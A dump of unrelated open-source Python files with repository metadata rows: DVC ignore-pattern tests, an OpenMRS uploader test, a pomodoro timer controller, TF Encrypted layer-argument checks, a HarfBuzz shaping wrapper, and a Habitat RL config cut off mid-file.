tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "\n".join(pattern_list))
dvc.tree.__dict__.pop("dvcignore", None)
path = PathInfo(tmp_dir)
assert set(dvc.tree.walk_files(path / "dir")) == {
path / relpath for relpath in result_set
}
# If there is a separator at the end of the pattern then the pattern
# will only match directories,
# otherwise the pattern can match both files and directories.
# For example, a pattern doc/frotz/ matches doc/frotz directory,
# but not a/doc/frotz directory;
def test_ignore_sub_directory(tmp_dir, dvc):
tmp_dir.gen(
{
"dir": {
"doc": {"fortz": {"b": "b"}},
"a": {"doc": {"fortz": {"a": "a"}}},
}
}
)
tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "doc/fortz"}})
dvc.tree.__dict__.pop("dvcignore", None)
path = PathInfo(tmp_dir)
assert set(dvc.tree.walk_files(path / "dir")) == {
path / "dir" / "a" / "doc" / "fortz" / "a",
path / "dir" / DvcIgnore.DVCIGNORE_FILE,
}
# however frotz/ matches frotz and a/frotz that is a directory
def test_ignore_directory(tmp_dir, dvc):
tmp_dir.gen({"dir": {"fortz": {}, "a": {"fortz": {}}}})
tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "fortz"}})
dvc.tree.__dict__.pop("dvcignore", None)
path = PathInfo(tmp_dir)
assert set(dvc.tree.walk_files(path / "dir")) == {
path / "dir" / DvcIgnore.DVCIGNORE_FILE,
}
def test_multi_ignore_file(tmp_dir, dvc, monkeypatch):
tmp_dir.gen({"dir": {"subdir": {"should_ignore": "1", "not_ignore": "1"}}})
tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/subdir/*_ignore")
tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "!subdir/not_ignore"}})
dvc.tree.__dict__.pop("dvcignore", None)
path = PathInfo(tmp_dir)
assert set(dvc.tree.walk_files(path / "dir")) == {
path / "dir" / "subdir" / "not_ignore",
path / "dir" / DvcIgnore.DVCIGNORE_FILE,
}
def test_pattern_trie_tree(tmp_dir, dvc):
tmp_dir.gen(
{
"top": {
"first": {
DvcIgnore.DVCIGNORE_FILE: "a\nb\nc",
"middle": {
"second": {
DvcIgnore.DVCIGNORE_FILE: "d\ne\nf",
"bottom": {},
}
},
},
},
"other": {DvcIgnore.DVCIGNORE_FILE: "1\n2\n3"},
}
)
dvc.tree.__dict__.pop("dvcignore", None)
ignore_pattern_trie = None
for ignore in dvc.tree.dvcignore.ignores:
if isinstance(ignore, DvcIgnorePatternsTrie):
ignore_pattern_trie = ignore
break
assert ignore_pattern_trie is not None
ignore_pattern_top = ignore_pattern_trie[os.fspath(tmp_dir / "top")]
ignore_pattern_other = ignore_pattern_trie[os.fspath(tmp_dir / "other")]
ignore_pattern_first = ignore_pattern_trie[
os.fspath(tmp_dir / "top" / "first")
]
ignore_pattern_middle = ignore_pattern_trie[
os.fspath(tmp_dir / "top" / "first" / "middle")
]
ignore_pattern_second = ignore_pattern_trie[
os.fspath(tmp_dir / "top" / "first" / "middle" / "second")
]
ignore_pattern_bottom = ignore_pattern_trie[
os.fspath(tmp_dir / "top" / "first" / "middle" / "second" / "bottom")
]
assert not ignore_pattern_top
assert (
DvcIgnorePatterns([], os.fspath(tmp_dir / "top")) == ignore_pattern_top
)
assert (
DvcIgnorePatterns(["1", "2", "3"], os.fspath(tmp_dir / "other"))
== ignore_pattern_other
)
assert (
DvcIgnorePatterns(
["a", "b", "c"], os.fspath(tmp_dir / "top" / "first")
)
== ignore_pattern_first
)
assert (
DvcIgnorePatterns(
["a", "b", "c"], os.fspath(tmp_dir / "top" / "first")
)
== ignore_pattern_middle
)
assert (
DvcIgnorePatterns(
[
"a",
"b",
"c",
"/middle/second/**/d",
"/middle/second/**/e",
"/middle/second/**/f",
],
os.fspath(tmp_dir / "top" / "first"),
)
== ignore_pattern_second
)
assert (
DvcIgnorePatterns(
[
"a",
"b",
"c",
"/middle/second/**/d",
"/middle/second/**/e",
"/middle/second/**/f",
],
os.fspath(tmp_dir / "top" / "first"),
)
== ignore_pattern_bottom
)
def test_ignore_in_added_dir(tmp_dir, dvc):
tmp_dir.gen(
{
"dir": {
"sub": {
"ignored": {"content": "ignored content"},
"not_ignored": "not ignored content",
}
},
".dvcignore": "**/ignored",
}
)
dvc.tree.__dict__.pop("dvcignore", None)
ignored_path = tmp_dir / "dir" / "sub" / "ignored"
assert not dvc.tree.exists(PathInfo(ignored_path))
assert ignored_path.exists()
dvc.add("dir")
shutil.rmtree(ignored_path)
dvc.checkout()
assert not ignored_path.exists()
| 31.260204 | 79 | 0.5945 | 1,518 | 12,254 | 4.550066 | 0.128459 | 0.065151 | 0.036485 | 0.027798 | 0.582597 | 0.544665 | 0.491386 | 0.397568 | 0.371218 | 0.345012 | 0 | 0.002172 | 0.248572 | 12,254 | 391 | 80 | 31.340153 | 0.747937 | 0.044557 | 0 | 0.350649 | 0 | 0 | 0.133892 | 0 | 0 | 0 | 0 | 0 | 0.107143 | 1 | 0.061688 | false | 0 | 0.035714 | 0 | 0.097403 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4154f5618899e57ee64e540445a53194c1b762ee | 1,479 | py | Python | synthea-hiv/uploader/uploader_test.py | GoogleCloudPlatform/openmrs-fhir-analytics | 839a5c54e0c81d174522dcb9930b26bc49dfa748 | [
"ECL-2.0",
"Apache-2.0"
] | 39 | 2020-08-07T18:10:21.000Z | 2021-12-24T14:08:36.000Z | synthea-hiv/uploader/uploader_test.py | mozzy11/openmrs-fhir-analytics | 796c75f3cc94cfad08e6e4a42d670830e9302d17 | [
"Apache-2.0"
] | 205 | 2020-08-20T05:25:29.000Z | 2022-02-04T19:20:44.000Z | synthea-hiv/uploader/uploader_test.py | mozzy11/openmrs-fhir-analytics | 796c75f3cc94cfad08e6e4a42d670830e9302d17 | [
"Apache-2.0"
] | 32 | 2020-08-13T19:14:50.000Z | 2022-03-25T04:45:39.000Z | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from unittest import mock
import uploader
class UploaderTest(unittest.TestCase):
def setUp(self):
super().setUp()
self.mock_client = mock.MagicMock()
self.mock_bundle = mock.MagicMock()
self._upload_resource = mock.patch.object(
uploader.Uploader, '_upload_resource', return_value='123').start()
def test_upload_bundle(self):
self.mock_bundle.openmrs_patient = mock.MagicMock()
upload_handler = uploader.Uploader(self.mock_client)
upload_handler.upload_openmrs_bundle(self.mock_bundle)
self.assertTrue(self._upload_resource.called)
self.assertEqual(self.mock_bundle.openmrs_patient.base.new_id, '123')
def test_upload_bundle_gcp(self):
self.mock_bundle.patient = None
upload_handler = uploader.Uploader(self.mock_client)
upload_handler.upload_bundle(self.mock_bundle)
self.assertFalse(self._upload_resource.called)
| 35.214286 | 74 | 0.76403 | 206 | 1,479 | 5.325243 | 0.480583 | 0.065634 | 0.076572 | 0.02917 | 0.20784 | 0.113036 | 0.113036 | 0.113036 | 0.113036 | 0.113036 | 0 | 0.01112 | 0.148749 | 1,479 | 41 | 75 | 36.073171 | 0.860207 | 0.370521 | 0 | 0.095238 | 0 | 0 | 0.023991 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4155116ee8c8f0032b20650c9fd29fb3f6faf25b | 7,033 | py | Python | stargazing/pomodoro/pomodoro_controller.py | mtu2/stargazing | 8c32728d64e8a7273299ab9d88e814d7a7bb47f2 | [
"MIT"
] | null | null | null | stargazing/pomodoro/pomodoro_controller.py | mtu2/stargazing | 8c32728d64e8a7273299ab9d88e814d7a7bb47f2 | [
"MIT"
] | null | null | null | stargazing/pomodoro/pomodoro_controller.py | mtu2/stargazing | 8c32728d64e8a7273299ab9d88e814d7a7bb47f2 | [
"MIT"
] | null | null | null | from __future__ import annotations
from enum import Enum
from typing import List
import os.path as path
import stargazing.data.database as database
import stargazing.audio.audio_controller as audio_ac
import stargazing.audio.audio_player as audio_ap
import stargazing.pomodoro.timer as pomo_t
import stargazing.project.project_controller as proj_pc
from stargazing.utils.format_funcs import format_pomodoro_time
ALARM_START_PATH = f"{path.dirname(path.abspath(__file__))}/../res/alarm_start.mp3"
ALARM_FINISH_PATH = f"{path.dirname(path.abspath(__file__))}/../res/alarm_finish.mp3"
class PomodoroIntervalSettings():
"""Interval settings for the pomodoro timer.
@param work_secs: Number of seconds for the work interval of the timer.
@param break_secs: Number of seconds for the break interval of the timer."""
def __init__(self, work_secs: int, break_secs: int) -> None:
self.work_secs = work_secs
self.break_secs = break_secs
@property
def name(self) -> str:
return f"{format_pomodoro_time(self.work_secs, False)} + {format_pomodoro_time(self.break_secs, False)}"
def __eq__(self, o: PomodoroIntervalSettings) -> bool:
return self.work_secs == o.work_secs and self.break_secs == o.break_secs
def __ne__(self, o: PomodoroIntervalSettings) -> bool:
return not self.__eq__(o)
class PomodoroStatus(Enum):
INACTIVE = "inactive"
WORK = "work"
BREAK = "break"
PAUSED_WORK = "paused work"
PAUSED_BREAK = "paused break"
FINISHED_WORK = "finished work"
FINISHED_BREAK = "finished break"
class PomodoroController():
"""Pomodoro manager, containing current pomodoro timer, status, autostart option and interval settings.
@param project_controller: Instance of a project controller.
@param audio_controller: Instance of an audio controller."""
def __init__(self, project_controller: proj_pc.ProjectController, audio_controller: audio_ac.AudioController,
interval_time: PomodoroIntervalSettings = None, last_autostart=True) -> None:
self.project_controller = project_controller
self.audio_controller = audio_controller
self.interval_settings = interval_time if interval_time else PomodoroIntervalSettings(
2400, 600)
self.autostart_setting = last_autostart
self.timer = pomo_t.Timer(self.interval_settings.work_secs)
self.status = PomodoroStatus.INACTIVE
def finish_timer(self, disable_sound=False) -> None:
if self.status in (PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK):
database.insert_pomodoro(
self.project_controller.current, self.timer)
self.timer = pomo_t.Timer(self.interval_settings.break_secs)
if not disable_sound:
self.__play_alarm_sound(ALARM_FINISH_PATH)
if self.autostart_setting:
self.timer.start()
self.status = PomodoroStatus.BREAK
else:
self.status = PomodoroStatus.FINISHED_WORK
elif self.status in (PomodoroStatus.BREAK, PomodoroStatus.PAUSED_BREAK):
self.timer = pomo_t.Timer(self.interval_settings.work_secs)
if self.autostart_setting:
self.timer.start()
self.status = PomodoroStatus.WORK
if not disable_sound:
self.__play_alarm_sound(ALARM_START_PATH)
else:
self.status = PomodoroStatus.FINISHED_BREAK
def reset_timer(self) -> None:
if self.status in (PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK, PomodoroStatus.FINISHED_WORK):
database.insert_pomodoro(
self.project_controller.current, self.timer)
self.timer = pomo_t.Timer(self.interval_settings.work_secs)
self.timer.start()
self.status = PomodoroStatus.WORK
elif self.status in (PomodoroStatus.BREAK, PomodoroStatus.PAUSED_BREAK, PomodoroStatus.FINISHED_BREAK):
self.timer = pomo_t.Timer(self.interval_settings.break_secs)
self.timer.start()
self.status = PomodoroStatus.BREAK
def update_timer(self) -> None:
time_diff, timer_complete = self.timer.update()
if self.status == PomodoroStatus.WORK:
self.project_controller.add_todays_total_time(time_diff)
self.project_controller.current.add_time(time_diff, True)
if timer_complete:
self.finish_timer()
def toggle_start_stop(self) -> None:
if self.status in (PomodoroStatus.INACTIVE, PomodoroStatus.FINISHED_BREAK):
self.timer.start()
self.status = PomodoroStatus.WORK
self.__play_alarm_sound(ALARM_START_PATH)
elif self.status == PomodoroStatus.PAUSED_WORK:
self.timer.continue_()
self.status = PomodoroStatus.WORK
elif self.status == PomodoroStatus.FINISHED_WORK:
self.timer.start()
self.status = PomodoroStatus.BREAK
elif self.status == PomodoroStatus.PAUSED_BREAK:
self.timer.continue_()
self.status = PomodoroStatus.BREAK
elif self.status == PomodoroStatus.WORK:
self.timer.pause()
self.status = PomodoroStatus.PAUSED_WORK
elif self.status == PomodoroStatus.BREAK:
self.timer.pause()
self.status = PomodoroStatus.PAUSED_BREAK
def set_interval_settings(self, interval_settings: PomodoroIntervalSettings) -> None:
self.interval_settings = interval_settings
# Edit current timer settings without resetting
if self.status in (PomodoroStatus.INACTIVE, PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK):
self.timer.interval = interval_settings.work_secs
else:
self.timer.interval = interval_settings.break_secs
def __play_alarm_sound(self, path) -> None:
curr_vol = self.audio_controller.get_volume()
audio_decr = 15
self.audio_controller.set_volume(max(curr_vol - audio_decr, 0))
alarm = audio_ap.AudioPlayer(path)
alarm.set_volume(curr_vol)
alarm.play()
# TODO: this needs to be async - wait for the alarm length
self.audio_controller.set_volume(curr_vol)
@property
def timer_display(self) -> str:
if self.status in (PomodoroStatus.INACTIVE, PomodoroStatus.FINISHED_BREAK):
return "START TIMER"
elif self.status == PomodoroStatus.WORK:
return f"BREAK IN {self.timer.remaining_time}"
elif self.status == PomodoroStatus.BREAK:
return f"POMODORO IN {self.timer.remaining_time}"
elif self.status == PomodoroStatus.PAUSED_WORK:
return f"PAUSED [WORK {self.timer.remaining_time}]"
elif self.status == PomodoroStatus.PAUSED_BREAK:
return f"PAUSED [BREAK {self.timer.remaining_time}]"
elif self.status == PomodoroStatus.FINISHED_WORK:
return "START BREAK"
| 39.072222 | 113 | 0.681928 | 815 | 7,033 | 5.640491 | 0.159509 | 0.067435 | 0.125299 | 0.060909 | 0.510333 | 0.415271 | 0.376115 | 0.29454 | 0.258864 | 0.159887 | 0 | 0.002231 | 0.235177 | 7,033 | 179 | 114 | 39.290503 | 0.852389 | 0.072942 | 0 | 0.390625 | 0 | 0 | 0.071473 | 0.047443 | 0 | 0 | 0 | 0.005587 | 0 | 1 | 0.09375 | false | 0 | 0.078125 | 0.023438 | 0.320313 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4156d6278870fbb774b81e7ffbdf14d0c4744d9b | 2,490 | py | Python | tf_encrypted/keras/layers/layers_utils.py | wqruan/tf-encrypted | 50ee4ae3ba76b7c1f70a90e18f875191adea0a07 | [
"Apache-2.0"
] | 825 | 2019-04-18T09:21:32.000Z | 2022-03-30T05:55:26.000Z | tf_encrypted/keras/layers/layers_utils.py | wqruan/tf-encrypted | 50ee4ae3ba76b7c1f70a90e18f875191adea0a07 | [
"Apache-2.0"
] | 354 | 2019-04-18T08:42:40.000Z | 2022-03-31T18:06:31.000Z | tf_encrypted/keras/layers/layers_utils.py | wqruan/tf-encrypted | 50ee4ae3ba76b7c1f70a90e18f875191adea0a07 | [
"Apache-2.0"
] | 161 | 2019-05-02T16:43:31.000Z | 2022-03-31T01:35:03.000Z | """TF Encrypted Keras layers utils"""
import inspect
import tensorflow as tf
class UnknownLayerArgError(ValueError):
"""Raise error for unknown layer arguments.
Args:
arg_name: TF Encrypted Keras layer argument name (string)
layer_sign: TensorFlow Keras layer signature (dict)
tf_layer_name: TensorFlow Keras layer name (string)
"""
def __init__(self, arg_name, layer_sign, layer_name):
super(UnknownLayerArgError, self).__init__()
self.arg_name = arg_name
self.layer_sign = layer_sign
self.layer_name = layer_name
def __str__(self):
msg = (
"Argument '{arg_name}' is not part of the "
"signature for '{layer_name}' layers: {layer_sign}"
)
return msg.format(
arg_name=self.arg_name,
layer_name=self.layer_name,
layer_sign=self.layer_sign.keys(),
)
class LayerArgNotImplementedError(NotImplementedError):
"""Raise error when layer argument is not yet supported in TFE.
Args:
arg: TFE layer argument
arg_name: TFE layer argument name (string)
tf_layer_name: Tensorflow keras layer name (string)
"""
def __init__(self, arg_name, tf_layer_name, tf_default_arg):
super(LayerArgNotImplementedError, self).__init__()
self.arg_name = arg_name
self.tf_layer_name = tf_layer_name
self.tf_default_arg = tf_default_arg
def __str__(self):
arg_not_impl_msg = (
"`{}` argument is not implemented for layer {}. "
"Please use the default value of {}."
)
return arg_not_impl_msg.format(
self.arg_name, self.tf_layer_name, self.tf_default_arg
)
def default_args_check(arg, arg_name, tf_layer_name):
"""Check if the layer is using the dfault argument
Args:
arg: TFE layer argument
arg_name: TFE layer argument name (string)
tf_layer_name: Tensorflow keras layer name (string)
Raises:
NotImplementedError: if this argument is not implemented for this `layer`.
"""
tf_layer_cls = getattr(tf.keras.layers, tf_layer_name)
layer_sign = inspect.signature(tf_layer_cls.__init__).parameters
if arg_name not in layer_sign:
raise UnknownLayerArgError(arg_name, layer_sign, tf_layer_name)
tf_default_arg = layer_sign[arg_name].default
if arg != tf_default_arg:
raise LayerArgNotImplementedError(arg_name, tf_layer_name, tf_default_arg)
| 32.337662 | 82 | 0.675904 | 323 | 2,490 | 4.866873 | 0.19195 | 0.114504 | 0.076972 | 0.038168 | 0.353053 | 0.307252 | 0.278626 | 0.244275 | 0.172392 | 0.172392 | 0 | 0 | 0.245382 | 2,490 | 76 | 83 | 32.763158 | 0.836615 | 0.283534 | 0 | 0.1 | 0 | 0 | 0.101296 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.05 | 0 | 0.275 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4158338da63ba358220ee7b0c0e8ce7b54fd01ff | 5,850 | py | Python | vharfbuzz.py | KazunariTsuboi/font-engineering | 2b80182d9cdfebf9853c01295ab13046f2ccb5a1 | [
"Apache-2.0"
] | null | null | null | vharfbuzz.py | KazunariTsuboi/font-engineering | 2b80182d9cdfebf9853c01295ab13046f2ccb5a1 | [
"Apache-2.0"
] | null | null | null | vharfbuzz.py | KazunariTsuboi/font-engineering | 2b80182d9cdfebf9853c01295ab13046f2ccb5a1 | [
"Apache-2.0"
] | null | null | null | """A user-friendlier way to use Harfbuzz in Python."""
import uharfbuzz as hb
from fontTools.ttLib import TTFont
import re
class Vharfbuzz:
def __init__(self, filename):
"""Opens a font file and gets ready to shape text."""
self.filename = filename
with open(self.filename, "rb") as fontfile:
self.fontdata = fontfile.read()
self.ttfont = TTFont(filename)
self.glyphOrder = self.ttfont.getGlyphOrder()
self.prepare_shaper()
self.shapers = None
self.drawfuncs = None
def prepare_shaper(self):
face = hb.Face(self.fontdata)
font = hb.Font(face)
upem = face.upem
font.scale = (upem, upem)
hb.ot_font_set_funcs(font)
self.hbfont = font
def make_message_handling_function(self, buf, onchange):
self.history = {"GSUB": [], "GPOS": []}
self.lastLookupID = None
def handle_message(msg, buf2):
m = re.match("start lookup (\\d+)", msg)
if m:
lookupid = int(m[1])
self.history[self.stage].append(self.serialize_buf(buf2))
m = re.match("end lookup (\\d+)", msg)
if m:
lookupid = int(m[1])
if self.serialize_buf(buf2) != self.history[self.stage][-1]:
onchange(self, self.stage, lookupid, self._copy_buf(buf2))
self.history[self.stage].pop()
if msg.startswith("start GPOS stage"):
self.stage = "GPOS"
return handle_message
def shape(self, text, onchange=None):
"""Shapes a text
This shapes a piece of text, return a uharfbuzz `Buffer` object.
Additionally, if an `onchange` function is provided, this will be called
every time the buffer changes *during* shaping, with the following arguments:
- ``self``: the vharfbuzz object.
- ``stage``: either "GSUB" or "GPOS"
- ``lookupid``: the current lookup ID
- ``buffer``: a copy of the buffer as a list of lists (glyphname, cluster, position)
"""
self.prepare_shaper()
buf = hb.Buffer()
buf.add_str(text)
buf.guess_segment_properties()
self.stage = "GSUB"
if onchange:
f = self.make_message_handling_function(buf, onchange)
buf.set_message_func(f)
hb.shape(self.hbfont, buf, shapers=self.shapers)
self.stage = "GPOS"
return buf
def _copy_buf(self, buf):
# Or at least the bits we care about
outs = []
for info, pos in zip(buf.glyph_infos, buf.glyph_positions):
l = [self.glyphOrder[info.codepoint], info.cluster]
if self.stage == "GPOS":
l.append(pos.position)
else:
l.append(None)
outs.append(l)
return outs
def serialize_buf(self, buf):
"""Returns the contents of the given buffer in a string format similar to
that used by hb-shape."""
outs = []
for info, pos in zip(buf.glyph_infos, buf.glyph_positions):
outs.append("%s=%i" % (self.glyphOrder[info.codepoint], info.cluster))
if self.stage == "GPOS":
outs[-1] = outs[-1] + "+%i" % (pos.position[2])
if self.stage == "GPOS" and (pos.position[0] != 0 or pos.position[1] != 0):
outs[-1] = outs[-1] + "@<%i,%i>" % (pos.position[0], pos.position[1])
return "|".join(outs)
def setup_svg_draw_funcs(self):
if self.drawfuncs:
return
def move_to(x, y, c):
c["output_string"] = c["output_string"] + f"M{x},{y}"
def line_to(x, y, c):
c["output_string"] = c["output_string"] + f"L{x},{y}"
def cubic_to(c1x, c1y, c2x, c2y, x, y, c):
c["output_string"] = (
c["output_string"] + f"C{c1x},{c1y} {c2x},{c2y} {x},{y}"
)
def quadratic_to(c1x, c1y, x, y, c):
c["output_string"] = c["output_string"] + f"Q{c1x},{c1y} {x},{y}"
def close_path(c):
c["output_string"] = c["output_string"] + "Z"
self.drawfuncs = hb.DrawFuncs.create()
self.drawfuncs.set_move_to_func(move_to)
self.drawfuncs.set_line_to_func(line_to)
self.drawfuncs.set_cubic_to_func(cubic_to)
self.drawfuncs.set_quadratic_to_func(quadratic_to)
self.drawfuncs.set_close_path_func(close_path)
def glyph_to_svg_path(self, gid):
if not hasattr(hb, "DrawFuncs"):
raise ValueError(
"glyph_to_svg_path requires uharfbuzz with draw function support"
)
self.setup_svg_draw_funcs()
container = {"output_string": ""}
self.drawfuncs.draw_glyph(self.hbfont, gid, container)
return container["output_string"]
def buf_to_svg(self, buf):
x_cursor = 0
y_cursor = 0
paths = []
svg = ""
for info, pos in zip(buf.glyph_infos, buf.glyph_positions):
glyph_path = self.glyph_to_svg_path(info.codepoint)
dx, dy = pos.position[0], pos.position[1]
p = (
f'<path d="{glyph_path}" '
+ f' transform="translate({x_cursor+dx}, {y_cursor+dy})"/>\n'
)
svg += p
x_cursor += pos.position[2]
y_cursor += pos.position[3]
svg = (
(
f'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 {x_cursor} 2000"'
+ ' transform="matrix(1 0 0 -1 0 1000)">\n'
)
+ svg
+ "</svg>\n"
)
return svg
# v = Vharfbuzz("/Users/simon/Library/Fonts/SourceSansPro-Regular.otf")
# buf = v.shape("ABCj")
# svg = v.buf_to_svg(buf)
# import cairosvg
# cairosvg.svg2png(bytestring=svg, write_to="foo.png")
| 34.411765 | 88 | 0.558462 | 753 | 5,850 | 4.201859 | 0.280212 | 0.045512 | 0.041087 | 0.022124 | 0.190265 | 0.183312 | 0.142857 | 0.134324 | 0.134324 | 0.117889 | 0 | 0.014081 | 0.308034 | 5,850 | 169 | 89 | 34.615385 | 0.76754 | 0.143248 | 0 | 0.122951 | 0 | 0.008197 | 0.120226 | 0.007072 | 0 | 0 | 0 | 0 | 0 | 1 | 0.122951 | false | 0 | 0.02459 | 0 | 0.213115 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
415b5b68914faf3e3638db9ddfedb6c109eb3f7e | 9,973 | py | Python | habitat_baselines/config/default.py | rpartsey/habitat-pointnav-aux | 03a24ddca8ab257f64092c70d4f2ff6805287b40 | [
"MIT",
"Unlicense"
] | 15 | 2020-07-10T15:43:02.000Z | 2022-03-09T03:11:30.000Z | habitat_baselines/config/default.py | rpartsey/habitat-pointnav-aux | 03a24ddca8ab257f64092c70d4f2ff6805287b40 | [
"MIT",
"Unlicense"
] | 2 | 2020-09-09T19:09:19.000Z | 2020-10-21T16:30:23.000Z | habitat_baselines/config/default.py | rpartsey/habitat-pointnav-aux | 03a24ddca8ab257f64092c70d4f2ff6805287b40 | [
"MIT",
"Unlicense"
] | 1 | 2021-02-05T14:50:30.000Z | 2021-02-05T14:50:30.000Z | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import List, Optional, Union
import numpy as np
from habitat import get_config as get_task_config
from habitat.config import Config as CN
DEFAULT_CONFIG_DIR = "configs/"
CONFIG_FILE_SEPARATOR = ","
# -----------------------------------------------------------------------------
# EXPERIMENT CONFIG
# -----------------------------------------------------------------------------
_C = CN()
_C.BASE_TASK_CONFIG_PATH = "configs/tasks/pointnav.yaml"
_C.TASK_CONFIG = CN() # task_config will be stored as a config node
_C.CMD_TRAILING_OPTS = [] # store command line options as list of strings
_C.TRAINER_NAME = "ppo"
_C.ENV_NAME = "NavRLEnv"
_C.SIMULATOR_GPU_ID = 0
_C.TORCH_GPU_ID = 0
_C.VIDEO_OPTION = ["disk", "tensorboard"]
_C.TENSORBOARD_DIR = "tb"
_C.VIDEO_DIR = "video_dir"
_C.TEST_EPISODE_COUNT = -1
_C.EVAL_CKPT_PATH_DIR = "data/checkpoints" # path to ckpt or path to ckpts dir
_C.NUM_PROCESSES = 16
_C.SENSORS = ["RGB_SENSOR", "DEPTH_SENSOR"]
_C.CHECKPOINT_FOLDER = "data/checkpoints"
_C.NUM_UPDATES = 10000
_C.LOG_INTERVAL = 10
_C.LOG_FILE = "train.log"
_C.CHECKPOINT_INTERVAL = 50
# -----------------------------------------------------------------------------
# EVAL CONFIG
# -----------------------------------------------------------------------------
_C.EVAL = CN()
# The split to evaluate on
_C.EVAL.SPLIT = "val"
_C.EVAL.USE_CKPT_CONFIG = True
# -----------------------------------------------------------------------------
# REINFORCEMENT LEARNING (RL) ENVIRONMENT CONFIG
# -----------------------------------------------------------------------------
_C.RL = CN()
_C.RL.REWARD_MEASURE = "distance_to_goal"
_C.RL.SUCCESS_MEASURE = "spl"
_C.RL.SUCCESS_REWARD = 2.5
_C.RL.SLACK_REWARD = -0.01
# -----------------------------------------------------------------------------
# PROXIMAL POLICY OPTIMIZATION (PPO)
# -----------------------------------------------------------------------------
_C.RL.PPO = CN()
_C.RL.PPO.clip_param = 0.2
_C.RL.PPO.ppo_epoch = 4
_C.RL.PPO.num_mini_batch = 16
_C.RL.PPO.value_loss_coef = 0.5
_C.RL.PPO.entropy_coef = 0.01
_C.RL.PPO.aux_loss_coef = 1.0
_C.RL.PPO.lr = 7e-4
_C.RL.PPO.eps = 1e-5
_C.RL.PPO.max_grad_norm = 0.5
_C.RL.PPO.num_steps = 5
_C.RL.PPO.use_gae = True
_C.RL.PPO.use_linear_lr_decay = False
_C.RL.PPO.use_linear_clip_decay = False
_C.RL.PPO.gamma = 0.99
_C.RL.PPO.tau = 0.95
_C.RL.PPO.reward_window_size = 50
# Policy
_C.RL.PPO.policy = "BASELINE"
_C.RL.PPO.POLICY = CN()
_C.RL.PPO.POLICY.name = "BASELINE"
_C.RL.PPO.POLICY.use_mean_and_var = False
_C.RL.PPO.POLICY.pretrained_encoder = False
_C.RL.PPO.POLICY.pretrained_weights = "/srv/share/ewijmans3/resnet-18-mp3d-rgbd-100m.pth"
_C.RL.PPO.POLICY.midlevel_medium = 'curvature' # "depth_zbuffer"
_C.RL.PPO.POLICY.HIERARCHICAL = CN()
_C.RL.PPO.POLICY.HIERARCHICAL.type = "linear" # linear, custom, all_for_one
_C.RL.PPO.POLICY.HIERARCHICAL.dependencies = () # A tuple representing a DAG OR a string representing a type
_C.RL.PPO.POLICY.IM = CN()
_C.RL.PPO.POLICY.IM.comm_interval = 16
# Auxiliary Tasks
_C.RL.AUX_TASKS = CN()
_C.RL.AUX_TASKS.tasks = []
_C.RL.AUX_TASKS.required_sensors = []
_C.RL.AUX_TASKS.distribution = "uniform" # one-hot, TODO gaussian
_C.RL.AUX_TASKS.entropy_coef = 0.0
_C.RL.AUX_TASKS.InverseDynamicsTask = CN()
_C.RL.AUX_TASKS.InverseDynamicsTask.loss_factor = 0.01
_C.RL.AUX_TASKS.InverseDynamicsTask.subsample_rate = 0.1
_C.RL.AUX_TASKS.ActionPrediction = CN()
_C.RL.AUX_TASKS.ActionPrediction.loss_factor = 0.01
_C.RL.AUX_TASKS.ActionPrediction.subsample_rate = 0.1
_C.RL.AUX_TASKS.ActionPrediction.num_steps = 3
_C.RL.AUX_TASKS.ActionRecall = CN()
_C.RL.AUX_TASKS.ActionRecall.loss_factor = 0.01
_C.RL.AUX_TASKS.ActionRecall.subsample_rate = 0.1
_C.RL.AUX_TASKS.ActionRecall.num_steps = 3
_C.RL.AUX_TASKS.TemporalDistanceTask = CN()
_C.RL.AUX_TASKS.TemporalDistanceTask.loss_factor = 0.1
